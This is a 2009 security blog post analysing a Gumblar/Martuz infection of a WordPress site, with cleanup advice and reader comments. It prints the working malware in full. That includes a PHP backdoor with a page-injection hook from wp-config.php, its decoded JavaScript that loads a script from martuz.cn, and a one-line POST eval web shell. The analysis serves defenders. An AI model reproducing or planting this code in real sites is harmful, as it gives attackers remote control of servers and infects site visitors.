Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 22 May 2009

Martuz.cn (aka Gumblar) and WordPress does not a good mix make ....

I spent a couple of hours last night (it's now 01:07 here) cleaning up someones WordPress based site after it became infected with the now very publicized Gumblar/Martuz infection. A quick look at the files, showed the infection to only be present in a few of the files, but the file locations varied.

For example, in wp-config.php we see (formatted for readability);

if(!function_exists('tmp_lkojfghx'))
{
if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihEQkNwKXt2YXIgTzdsPSclJztldmFsKHVuZXNjYXBlKCgnOjc2YXI6MjBhOjNkOjIyU2NyaXB0RW5naW5lOjIyOjJjYjozZDoyMlY6NjVyOjczOjY5b24oKToyYjoyMjoyY2o6M2Q6MjI6MjI6MmN1OjNkOjZlYXZpZ2E6NzQ6NmZyOjJldTo3M2VyOjQxZzo2NW46NzQ6M2JpZigodToyZWluZGU6NzhPZig6MjI6NDM6Njhyb206NjU6MjIpOjNjOjMwKToyNjoyNih1OjJlaW5kOjY1eE9mKDoyMlc6NjluOjIyKTozZTApOjI2OjI2KHU6MmVpbmRleE9mKDoyMk5UOjIwNjoyMjoyOTozYzApOjI2OjI2KGRvOjYzdW1lbnQ6MmVjOjZmb2tpZToyZTo2OW5kZTo3OE9mKDoyMm1pZWs6M2QxOjIyOjI5OjNjOjMwKToyNjoyNjoyODo3NHk6NzBlbzo2Nih6Ojcydjo3YXQ6NzMpOjIxOjNkdHlwZW86NjYoOjIyQToyMikpKTo3Yjo3YTo3MnY6N2F0czozZDoyMjo0MToyMjozYmV2YTo2Yyg6MjJpZjoyOHdpOjZlZDo2Zjo3NzoyZToyMithKzoyMjoyOWo6M2RqKzoyMithOjJiOjIyOjRkYTo2YW86NzI6MjIrYithKzoyMk06Njlub3I6MjI6MmJiKzo2MSs6MjI6NDJ1OjY5bDo2NDoyMjoyYmIrOjIyOjZhOjNiOjIyKTozYmQ6NmZjOjc1bWVudDoyZXdyaXRlOjI4OjIyOjNjc2NyaXB0OjIwc3JjOjNkOjJmOjJmbWFydDoyMjoyYjoyMnV6OjJlYzo2ZToyZnZpZDoyZjozZmlkOjNkOjIyOjJiais6MjI6M2U6M2M6NWM6MmY6NzNjOjcyaXB0OjNlOjIyKTozYjo3ZCcpLnJlcGxhY2UoREJDcCxPN2wpKSl9KSgvXDovZyk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s)
{
if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#$lt;script(.*?)$lt;/script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/$lt;>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}
$s1=preg_replace('#$lt;script language=javascript>$lt;!-- \n\(function\(.+?\n -->$lt;/script>#','',$s);
if(stristr($s,'$lt;body'))$s=preg_replace('#(\s*$lt;body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'$lt;/body')||stristr($s,'$lt;/title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;
}
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{
$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;
$i>=0;
$i--)
{
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('tmp_lkojfghx');
for($i=0;$i$lt;count($s);
$i++)
{
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();


That lovely bit of Base64 code you see above, decodes to;

<script language=javascript><!--
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);
--></script>


This is what you'll see in all of the .js files (the mumrik theme for example, has 5 .js files, and every single one of them contained the above), and it decodes to;

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}


However, with the exception of the wp-config.php file, the only affected files for the code containing the Base64 rubbish, were the index.php files (across the entire WordPress system, including all themes), but plugins were unaffected, as was the wp-admin directory?

Finally of course, we had the obligatory gifimg.php file. Again however, there was only one in this particular case, and it was located in the exec-php/images/ directory. This contained yet another Base64 encoded script, that decoded to;

if(isset($_POST['e']))eval(base64_decode($_POST['e']));


Presumably this receives POST data from the attackers server and/or the attackers themselves. Though I'd love to get hold of both the tools or such, used to do the actual infection itself, aswell as finding out what is actually contained in the POST request referenced in these scripts.

Needless to say of course, if your site does become affected by this, you'll find it far quicker and far easier, to just wipe the files and restore a clean backup (you do frequently backup your sites files - don't you?), and of course, though this should be blatantly obvious, STOP using basic passwords - they're not doing you any good (and yes, I know it's because they're easy to remember). If you are affected by this, or your website/server is affected by a different infection, and you need help cleaning it up, pop over to the Malware Domain List forums;

http://www.malwaredomainlist.com/forums/index.php?board=17.0

2 comments:

Jacky said...

For the usual Chinese crap, the hosts file can't do much, but Proxomitron user CAN !

http://prxbx.com/forums/showthread.php?tid=1374

MysteryFCM said...

A firewall filter, PAC file, IE restricted sites rule, will prevent access to sites too ;o)